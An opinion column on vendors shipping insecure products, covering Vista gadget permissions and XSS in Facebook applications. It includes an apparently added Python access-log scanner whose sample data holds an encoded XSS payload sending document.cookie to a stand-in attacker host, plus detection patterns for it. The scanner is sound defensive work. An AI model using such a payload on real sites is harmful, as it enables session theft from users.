New tech, old threats

Opinion by Ken Munro

With flaws in many new products, vendors should perhaps listen a bit more to the research community.

With every advance in technology comes a new business benefit – but advancements also bring risks and threats. Vendors will always trumpet the advantages of their new products, so it falls to the independent security experts to uncover the potential pitfalls.

At the risk of talking myself out of a job, the question needs to be asked: why aren't vendors getting it right first time? It seems like every few days another security flaw, or an issue previously considered to be resolved, pops up. Maybe it's the rush to get product to market that drives this, but surely it's just as important to get a secure product to market?

The much-discussed DNS vulnerability ‘discovered’ by Dan Kaminsky illustrates that what goes around comes around in technology. DNS vulnerabilities have been known about for years. More recently, Ian Green submitted a paper for his 2005 GSEC certification, detailing the same issues that have sent everyone into a patching frenzy. However, new technology means bigger and better versions of the same threats, so we have to work smarter to eradicate them at source first time around.

Microsoft is oft-maligned, but the Vista beta programme was a great move towards delivering more secure code to market. Why don't all vendors embrace the security research community as Microsoft did? To its credit, it invested hugely and delayed product releases in order to accommodate a Secure Development Lifecycle.

Microsoft has made real progress with security, but even it appears to have missed out on research into Vista Gadgets over the past couple of years. We have been looking at these in detail and have made some interesting discoveries.

Essentially, the Vista ‘Gadget’ could provide a new vector for malware to enter a system. The latest version of Internet Explorer supports ‘Protected Mode’, an excellent concept that prevents user files and content from being modified without consent; it also includes additional alerting capabilities to warn of malicious activity, and it attempts to reduce unwanted software installs. Unfortunately, these restrictions do not apply to gadgets.

As gadgets are treated as executable code, they are granted the same permissions as HTAs (HTML Applications), i.e. those of the Local Machine Zone security configuration. This allows gadgets to initialise and script ActiveX controls that are not marked as ‘safe’ for scripting, and to access data sources across domains.

An attacker could host hostile code on a web server under their control and propagate the malicious gadget through targeted email attacks, instant messaging networks and common spam.

This attack type is similar to what we have seen happen to another brand giant: Facebook. Unsurprisingly, hackers have turned their attention to the easiest attack vector in the social networking site: its hundreds of independent applications.

As with Vista's gadgets, applications can be independently created and made available to all users. These are privy to large amounts of sensitive data, all without clear user consent. Furthermore, they can be, and have been, subject to malicious XSS attacks, where a malicious user plants a link containing unwanted executable script in a website. When a Facebook user clicks the link, the malicious script (usually JavaScript) can then send the victim's cookie to a remote CGI script.
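The cookie-theft pattern described above leaves a recognisable trace in web-server access logs. The following is an added example, not code from the original column or from SecureTest: it parses a few constructed Apache-style log lines, URL-decodes each request, and flags requests whose decoded query carries script, rating them "high" when the script both reads `document.cookie` and references a host that is not one of the site's own (the `own_hosts` list and the log lines are assumptions for the demonstration).

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample access-log lines (not real traffic). The third line carries
# a reflected-XSS payload of the kind the column describes: a script that reads
# document.cookie and sends it to a CGI script on a remote host.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Sep/2008:12:00:01 +0100] "GET /apps/quiz?name=alice HTTP/1.1" 200 512
10.0.0.6 - - [01/Sep/2008:12:00:02 +0100] "GET /apps/quiz?name=%3Cb%3Ebob%3C%2Fb%3E HTTP/1.1" 200 530
10.0.0.7 - - [01/Sep/2008:12:00:03 +0100] "GET /apps/quiz?name=%3Cscript%3Enew+Image().src%3D%22http%3A%2F%2Fevil.example%2Fc.cgi%3F%22%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 700
"""

# Common log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d+)'
)
SCRIPT_RE = re.compile(r'<\s*script|\bon\w+\s*=|javascript:', re.IGNORECASE)
COOKIE_RE = re.compile(r'document\.cookie', re.IGNORECASE)
HOST_RE = re.compile(r'https?://([\w.-]+)', re.IGNORECASE)


def classify_request(path, own_hosts):
    """Return a finding for one request path, or None if it looks benign."""
    # Decode twice so double-encoded payloads are seen in the clear; the second
    # pass uses unquote() so a literal '+' in the payload is left alone.
    decoded = unquote(unquote_plus(path))
    if not SCRIPT_RE.search(decoded):
        return None
    reads_cookie = bool(COOKIE_RE.search(decoded))
    # Hosts named in the payload that are not the site's own: a likely drop point.
    external = [h for h in HOST_RE.findall(decoded) if h.lower() not in own_hosts]
    severity = "high" if reads_cookie and external else "medium"
    return {"severity": severity, "reads_cookie": reads_cookie,
            "external_hosts": external, "decoded": decoded}


def scan_log(text, own_hosts=("www.example.com",)):
    """Scan access-log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse as common log format
        finding = classify_request(m.group("path"), own_hosts)
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"))
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["external_hosts"], f["decoded"])
```

A "high" finding is worth correlating with session activity from other client addresses shortly afterwards, since a stolen cookie is only useful once replayed; marking session cookies HttpOnly denies `document.cookie` access to the script in the first place.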

What unifies Vista and Facebook is that neither has authorisation mechanisms, or at least none stringent enough, for gadget or application downloads. Both rely on the app or gadget developer to play by the rules.

As ever, the greatest weakness in computer security resides between the keyboard and the back of the chair. New technology and new/old threats go together like bees and honey, peas and carrots, Neo and Trinity. Fresh technology seduces us by offering bigger (smaller?), faster, stronger, when what we really need is cleaner, more secure – and with a giant flashing light that goes off whenever we attempt to do something stupid.

Ken Munro is director of SecureTest, the penetration and security testing division of NCC Group.
